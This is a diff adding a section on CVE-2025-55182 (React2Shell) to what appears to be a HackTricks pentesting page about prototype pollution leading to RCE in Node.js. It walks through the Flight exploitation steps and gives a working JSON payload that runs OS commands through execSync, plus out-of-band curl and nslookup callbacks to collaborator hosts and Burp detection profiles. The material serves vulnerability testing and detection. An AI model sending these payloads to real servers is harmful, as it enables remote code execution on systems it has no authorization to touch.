CVE-2025-55182 (React2Shell) New Detection Profiles for Burp...

src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md

@@ -747,6 +747,55 @@ Object.prototype.env = {
 require("./usage.js")
 ```
 
+## React Server Components Flight PP2RCE (CVE-2025-55182)
+
+React Server Components (RSC) exchange component trees over the Flight protocol, which is typically transported as `multipart/form-data` where each part contains JSON-like chunks with `$<id>:<path>` references. In React `19.0.0–19.2.0` / Next.js `15.0.4–16.0.6` the server-side resolver lets attackers point those references at magic properties such as `__proto__`, enabling prototype pollution that quickly escalates to arbitrary JavaScript and OS command execution inside the Node.js worker. For enumerating exposed RSC endpoints, see the [NextJS pentesting notes](../../../network-services-pentesting/pentesting-web/nextjs.md).
+
+### Flight exploitation flow
+
+1. **Reach an RSC endpoint** (usually identified by a `Next-Action` header and `react-server-dom-webpack` content-type) and send a crafted multipart POST that Flight will deserialize.
+2. **Pollute core prototypes** by assigning references such as `"then": "$1:__proto__:then"`. When the resolver walks that path it writes a controllable `then` into `Object.prototype`, giving the attacker influence over subsequent promise/thenable handling.
+3. **Pivot to the global `Function` constructor** by pointing `_response._formData.get` at `"$1:constructor:constructor"`. When the runtime later calls `_formData.get()` it actually runs `Function(<attacker controlled source>)`.
+4. **Execute Node primitives via `_response._prefix`**, e.g. `process.mainModule.require('child_process').execSync('COMMAND')`, to spawn OS commands under the Next.js worker account.
+5. **Exfiltrate command output** by throwing a `NEXT_REDIRECT` error whose `digest` is `NEXT_REDIRECT;push;/login?a=${res};307;`. Next.js forwards this into the `x-action-redirect` header of the HTTP 303 response, so attackers instantly see their command output.
+
+### Example Flight chunk
+
+```json
+{
+  "then": "$1:__proto__:then",
+  "status": "resolved_model",
+  "reason": -1,
+  "value": "{\"then\":\"$B1337\"}",
+  "_response": {
+    "_prefix": "var res=process.mainModule.require('child_process').execSync('COMMAND').toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${res};307;`});",
+    "_chunks": "$Q2",
+    "_formData": { "get": "$1:constructor:constructor" }
+  }
+}
+```
+
+### Safe verification primitives
+
+- **In-band math PoC (Unix-like):** Execute `echo $((31337*31337))` via `execSync`. The result `982013569` must appear inside the `x-action-redirect` header of a `303` response together with the `NEXT_REDIRECT` digest, proving arbitrary command execution without touching the filesystem or network.
+- **Windows-safe PoC:** Swap the payload to `powershell -c "31337*31337"`. The same `982013569` sentinel flowing through `x-action-redirect` proves a vulnerable Windows Node.js host.
+- **Out-of-band validation:** When WAF/CDN layers strip headers or responses, run a command like `nslookup <token>.burpcollaborator.net` (or `curl https://<token>.oastify.com`) from `_prefix`. Any DNS/HTTP interaction observed by the collaborator confirms exploitation even if the HTTP response is empty.
+
+### Burp Bounty Pro detection profiles
+
+Use **Extensions → Burp Bounty Pro → About → Check For Updates** to pull three purpose-built checks:
+
+- `CVE-2025-55182_React2Shell_RCE` – in-band profile that injects the Unix math command, watches for `303` redirects, and flags hosts only when `x-action-redirect` contains `982013569` to minimize false positives.
+- `CVE-2025-55182_React2Shell_RCE_OOB` – identical Flight payload structure but executes a collaborator callback so blind deployments or aggressively sanitized responses still register as RCE via Burp Collaborator events.
+- `CVE-2025-55182_React2Shell_RCE_Windows` – reuses the math technique with a PowerShell expression to safely test Windows-based Next.js stacks.
+
+### Operational workflow
+
+1. Run the in-band profile first for fast confirmation; it needs only a single HTTP request.
+2. If headers/body are missing or WAF interference is suspected, immediately repeat with the OOB profile and monitor Burp Collaborator.
+3. When targeting Windows infrastructure, add the Windows profile to confirm code execution using native tooling.
+
+
 ## VM Gadgets
 
 In the paper [https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf) is also indicated that the control of **`contextExtensions`** from some methods of the **`vm`** library could be used as a gadget.\
@@ -779,6 +828,7 @@ In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156c
 - [https://portswigger.net/research/prototype-pollution-node-no-filesystem](https://portswigger.net/research/prototype-pollution-node-no-filesystem)
 - [https://www.nodejs-security.com/blog/2024/prototype-pollution-regression](https://www.nodejs-security.com/blog/2024/prototype-pollution-regression)
 - [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
+- [CVE-2025-55182 (React2Shell): New Detection Profiles for Burp Bounty Pro](https://bountysecurity.ai/blogs/news/cve-2025-55182-react2shell-new-detection-profiles-for-burp-bounty-pro)
 
 {{#include ../../../banners/hacktricks-training.md}}